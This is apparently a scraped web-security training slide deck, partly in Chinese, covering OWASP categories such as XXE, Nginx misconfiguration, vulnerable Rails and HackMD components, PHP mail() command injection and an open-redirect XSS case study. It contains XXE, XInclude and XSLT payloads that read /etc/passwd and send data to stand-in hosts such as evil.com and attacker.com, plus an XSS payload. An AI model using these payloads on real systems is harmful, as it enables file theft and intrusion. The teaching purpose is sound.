Insecure design is not the source for all other Top 10 risk categories. There is a difference between insecure design and insecure implementation.
One of the factors that contribute to insecure design is the lack of business risk profiling inherent in the software or system being developed, and thus the failure to determine what level of security design is required.
Attacker accesses default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.
來自 HackenProof 的安全研究員發現透過 Shodan 進行例行性的安全審計時,發現某三個運行 Elasticsearch 叢集的 IP 向外暴露了將近 73 G 的敏感資訊。
Misconfiguration
Nginx - Case 1
It’s common we use variables, such as $uri, $document_uri, and $request_uri, to redirect users to somewhere
What would then happen?
CRLF Injection
Cont.
Why $uri will cause CRLF Injection?
$uri, $document_uri are URL decoded strings
$request_uri is the original, encoded string
Therefore, an implicit newline character might exists when you use the variables $uri and $document_uri
Nginx - Case 2
What would then happen?
Any response packet from /test2 will have no CSP header, thus no CSP protection
Cont.
Why? That’s because add_header directives are inherited from the previous level if and only if there are no add_header directives defined on the current level
XXE (XML eXternal Entity attack) is an attack that XML input containing a reference to an external entity which is processed by a weakly configured XML parser
Enabling disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts
XXE targets
Web servers (even in deep backend)
Xml-based documents: docx, pptx, odt, etc. (exist tools e.g. oxml_xxe) (microsoft office xxe)
For Open XML formats better to target [Content_Types].xml file for XXE injections.
Databases (MySQL, PostgreSQL, …)
XMP (Extensible Metadata Platform) in images (gif, png, jpg, …)
Web browsers
…
Exploitation
output data in XML, returned to user
OOB - Out-Of-Band (send sensitive data with external entity request)
<?xml version="1.0"?><!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)>
]><note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend</body></note>
Cont.
Attributes
<?xml version="1.0" standalone="yes"?>
XML standalone is a signal to the XML processor that the DTD is only for validation (usage of external entites will be forbidden). Default value is no, that is perfectly well for attacker, although some parsers ignore this option.
XML entities types
General entities: used in XML content like `&name;`
<!ENTITY name"Hello World">
Parameter entities: used inside doctype definition like `%name;`
<!ENTITY % name"Hello World"><!-- parameter entities can insert new entities --><!ENTITY % name"Hello %myEntity;">
Cont.
External entities: entities with query to external (not declared in current XML document) resource (can be used both: general entities and parameter entities)
<!ENTITY nameSYSTEM"URI/URL"><!ENTITY namePUBLIC"any_text""URI/URL"><!-- External entities can be used for doctypes too --><!DOCTYPE nameSYSTEM"address.dtd" [...]><!DOCTYPE namePUBLIC"any text""http://evil.com/evil.dtd">
Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover
Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts
Rails is a software library that extends the Ruby programming language. It’s often promoted as an MVC web framework, which stands for Model, View, and Controller respectively
De facto, Web developers are attracted by its simplicity and the priciple of Convention over Configuration, and it has become more popular in recent days
active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2.3.15, 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code
Or, cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion
Cont.
Remote Code Execution Vulnerability
Due to the support of parsing yaml in XML parser, we can craft a special XML payload to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application
Cont.
After Rails 3, the parsing of nodes with yaml type have been disallowed by default
lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before 2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data for processing by a YAML parser, which allows remote attackers to execute arbitrary code, conduct SQL injection attacks, or bypass authentication via crafted data that triggers unsafe decoding, a different vulnerability than CVE-2013-0156.
Cont.
Remote Code Execution Vulnerability
Before Rails 3.0.19, the default decoder used by default JSON parser is YAML
/api/v1/photoproxy server-side handler that could fetch a URL passed in a parameter and proxy the HTTP response
url:= r.FormValue("url")if!strings.HasPrefix(url,"https://picasaweb.google.com/data/feed/api"){writeJSONError(c, w, http.StatusBadRequest,"url parameter is missing or is an invalid endpoint")return}
Hence, if we want to trigger an XSS, we must find a cross-domain redirect endpoint exists in https://picasaweb.google.com
Step 2
Although a known redirect endpoint: https://picasaweb.google.com/bye?continue= exists, there’s another restriction that redirect from the continue parameter value is not fully open, as it needs to point to one of the Google domains (e.g. www.google.com)
In order to serve arbitrary content, Tomasz needed to find an open redirect on www.google.com and chain it
However, request handler the server specifies an application/json Content-Type that stops modern browsers from interpreting the response as HTML
Code Snippet
funcservePhotosProxy(w http.ResponseWriter, r *http.Request){
c :=newContext(r)if r.Method !="GET"{writeJSONError(c, w, http.StatusBadRequest,"invalid request method")return}
url := r.FormValue("url")if!strings.HasPrefix(url,"https://picasaweb.google.com/data/feed/api"){writeJSONError(c, w, http.StatusBadRequest,"url parameter is missing or is an invalid endpoint")return}
req, err := http.NewRequest("GET", url,nil)if err !=nil{writeJSONError(c, w,errStatus(err), err)return}
res, err :=httpClient(c).Do(req)if err !=nil{writeJSONError(c, w,errStatus(err), err)return}defer res.Body.Close()
w.Header().Set("Content-Type","application/json;charset=utf-8")
w.WriteHeader(res.StatusCode)
io.Copy(w, res.Body)}
Cont.
Tomasz found a clever trick to bypass this control. You’ll notice that the Content-Type header is only emitted when the response is successfully fetched
In the event of an error, the writeJSONError function is called instead
Step 4
Response
{"error":"Get http://woops-pocs.appspot.com: failed to parse Location header \"//><img src=x onerror='alert(document.domain)'\": parse //><img src=x onerror='alert(document.domain)': invalid character \" \" in host name"}
What can we learn from this case?
It could be problems sometimes that we implement someworkarounds
How to patch?
Discussion…
Ensure that the function emits the correctContent-Type, Such as application/json header in this case
Practical Web Hacking and Exploitation
Part 2
A4 Insecure Design
Introduction
Insecure design is not the source for all other Top 10 risk categories. There is a difference between insecure design and insecure implementation.
One of the factors that contribute to insecure design is the lack of business risk profiling inherent in the software or system being developed, and thus the failure to determine what level of security design is required.
實際案例 1 - Cool Pets NFT
Cool Cats 延伸項目 Cool Pets 在公開鑄造時期實作了一個 Captcha 驗證機制以防止機器人鑄造,但因其驗證並非隨機產生,因此可以提前鎖定一組驗證碼並重複使用。
實際案例 2 - 聊天10分鐘50元 / HowFun
A5 Security Misconfiguration
Introduction
Attacker accesses default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.
Common Pitfalls
Default Account and Password
https://cirt.net/passwords
實際案例 1 - Worse than Equifax: Personal records of 340M people leaked online
一間位於佛羅裡達的市調公司 Exactis 暴露了將近三億四千萬筆美國國民的敏感資訊。
實際案例 2 - Private data of more than 82 million US citizens left exposed
來自 HackenProof 的安全研究員發現透過 Shodan 進行例行性的安全審計時,發現某三個運行 Elasticsearch 叢集的 IP 向外暴露了將近 73 G 的敏感資訊。
Misconfiguration
Nginx - Case 1
What would then happen?
CRLF Injection
Cont.
Why $uri will cause CRLF Injection?
Nginx - Case 2
What would then happen?
Any response packet from /test2 will have no CSP header, thus no CSP protection
Cont.
Why? That’s because add_header directives are inherited from the previous level if and only if there are no add_header directives defined on the current level
gixy - Nginx configuration static analyzer
Version Control
Security Issue
When hackers discover…
Cont.
Intro to Git
Tool
Practice 1
http://127.0.0.1:8094/phpinfo.php
Practice 2
http://127.0.0.1:8095/?name=boik
Cont.
Hint:
Introduction to XXE
XXE targets
Exploitation
Terminology
DTD - Document Type Definition
Cont.
Attributes
<?xml version="1.0" standalone="yes"?>Default value is no, that is perfectly well for attacker, although some parsers ignore this option.
XML entities types
General entities: used in XML content like `&name;`
<!ENTITY name "Hello World">Parameter entities: used inside doctype definition like `%name;`
<!ENTITY % name "Hello World"> <!-- parameter entities can insert new entities --> <!ENTITY % name "Hello %myEntity;">Cont.
External entities: entities with query to external (not declared in current XML document) resource (can be used both: general entities and parameter entities)
<!ENTITY name SYSTEM "URI/URL"> <!ENTITY name PUBLIC "any_text" "URI/URL"> <!-- External entities can be used for doctypes too --> <!DOCTYPE name SYSTEM "address.dtd" [...]> <!DOCTYPE name PUBLIC "any text" "http://evil.com/evil.dtd">Can you explain this?
Attack Vectors
Say, we have following vulnerable code:
Vulnerable Code
Local FIle Inclusion
Exploit
Cont.
SSRF
Exploit
Cont.
OOB (Out-of-Band)
While we have no outputs back, we can utilize oob to retrieve the data from our controlled server.
Caution: In the internal DTD subset, parameter-entity references MUST NOT occur within markup declarations.
Ref: https://www.w3.org/TR/xml/#wfc-PEinInternalSubset
Exploit
http://192.168.10.150:8000/evil.dtd
Cont.
DoS
Exploit
Exploit 2
Error based
Case 1
Exploit
http://192.168.10.150:8000/evil.dtd
Cont.
Case 2
Exploit
http://192.168.10.150:8000/evil.dtd
Cont.
Mitigation
XSD Attack
XML Schema Definition Language (XSD) is used to define XML structure.
Attack Vectors
OOB: schemaLocation
<document xmlns="http://any.namespace.name/like.url" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://any.namespace.name/like.url http://attacker.com/evil.xsd">text</document>OOB: noNamespaceSchemaLocation
<document xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://attacker.com/evil.xsd">text</document>OOB: XInclude
<data xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include href="http://attacker.com/evil.xml"/> <xi:include href="file:///etc/passwd" parse="text"/> </data>Error based
<xs:restriction base="xs:string"> <xs:pattern value="&xxe;" /> </xs:restriction>XSLT Attack
eXtensible Stylesheet Language Transformations (XSLT) is used to convert one XML document to other.
Attack Vectors
Getting system information
<xsl:template match="/"> XSLT Version: <xsl:value-of select="system-property('xsl:version')" /> XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> XSLT Vendor URL: <xsl:value-of select="system-property('xsl:version-url')" /> </xsl:template>OOB: xml-stylesheet
<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="http://evil.com/evil.xsl"?> <doc></doc>XSLT Out-Of-Band through variables and value-of definition
<xsl:value-of select="document('test.html')" /> <xsl:value-of select="document('http://dev.company.com/secret.txt')" /><xsl:variable name="name1" select="document('file:///etc/passwd')" /> <xsl:variable name="name2" select="concat('http://evil.com/?', $name1)" /> <xsl:variable name="name3" select="document($name2)" />Practice 3
http://127.0.0.1:8096/?feed=http://feeds.bbci.co.uk/news/rss.xml?edition=int
Practice 4
http://127.0.0.1:8097/?feed=http://feeds.bbci.co.uk/news/rss.xml?edition=int
Practice 5
http://127.0.0.1:8098/
A6 Vulnerable and Outdated Components
Introduction
HackMD
HackMD - Part.1 (fixed)
HackMD 的簡報模式存在 Stored XSS 攻擊,其有問題的程式碼在這:
Vulnerable Code
Exploit
Response
HackMD - Part.2 (fixed)
HackMD 的 metadata 存在 Stored XSS 攻擊,其有問題的程式碼在這:
Vulnerable Code
Exploit
Exploit
HackMD - Part.3 (fixed)
HackMD 的 metadata 經過修補後仍然存在 Stored XSS 攻擊,其有問題的程式碼在這:
Vulnerable Code
Exploit
HackMD - Part.4 (fixed recently, commit: 93b9116)
What can we learn from this case?
How to patch?
Discussion…
JavaScript frameworks
AngularJS
A go-through upon escaping AngularJS’s sandbox utility.
ReactJS
case study: XSS via a spoofed React element
ReactJS gives you more protection with this PR.
Rails
CVE-2013-0156
Cont.
Cont.
DISALLOWED_TYPES = %w(symbol yaml) def initialize(xml, disallowed_types = nil) @xml = normalize_keys(XmlMini.parse(xml)) @disallowed_types = disallowed_types || DISALLOWED_TYPES endCVE-2013-0333
lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before 2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data for processing by a YAML parser, which allows remote attackers to execute arbitrary code, conduct SQL injection attacks, or bypass authentication via crafted data that triggers unsafe decoding, a different vulnerability than CVE-2013-0156.
Cont.
Third Parties
bootstrap-sass Ruby Gem
Practice 1
http://127.0.0.1:8099/
Cont.
Hint:
PHP’s mail() function
synopsis
Vulnerable Code
What can be wrong?
http://php.net/manual/en/function.mail.php
Function [ <internal:standard> function mail ] { - Parameters [5] { Parameter #0 [ <required> $to ] Parameter #1 [ <required> $subject ] Parameter #2 [ <required> $message ] Parameter #3 [ <optional> $additional_headers ] Parameter #4 [ <optional> $additional_parameters ] } }Cont.
Say we have the following snippet:
$to = "john@localhost"; $subject = "Simple Email"; $headers = "From: mike@localhost"; $body = 'Body of the message'; $sender = "admin@localhost"; mail($to, $subject, $body, $headers, "-f $sender");Cont.
Following request will be made:
Cont.
And pass the following data to its STDIN:
Arbitrary Command Injection
Cont.
Remote Code Execution
Vulnerable Code
Cont.
$_GET['from']
Cont.
Proof of Concept
Cont.
/var/www/html/rce.php
Practice 2
http://127.0.0.1:8100/
Hint:
Practice 3
http://127.0.0.1:8101/
Hint:
Appendix
Unvalidated Redirects and Forwards
Introduction
Real Case - Open redirects that matter
Tomasz Bojarski, coming from a little town in Poland, used not one, but two redirects to trigger an XSS on events.google.com.
Proof of Concept
Step 1
/api/v1/photoproxy server-side handler that could fetch a URL passed in a parameter and proxy the HTTP response
Step 2
Step 3
https://www.google.com/amp/<url-without-the-protocol>
Final PoC
Cont.
Code Snippet
Cont.
Step 4
Response
What can we learn from this case?
How to patch?
Discussion…
References
Cont.
Thank you
boik.su@cycarrier.com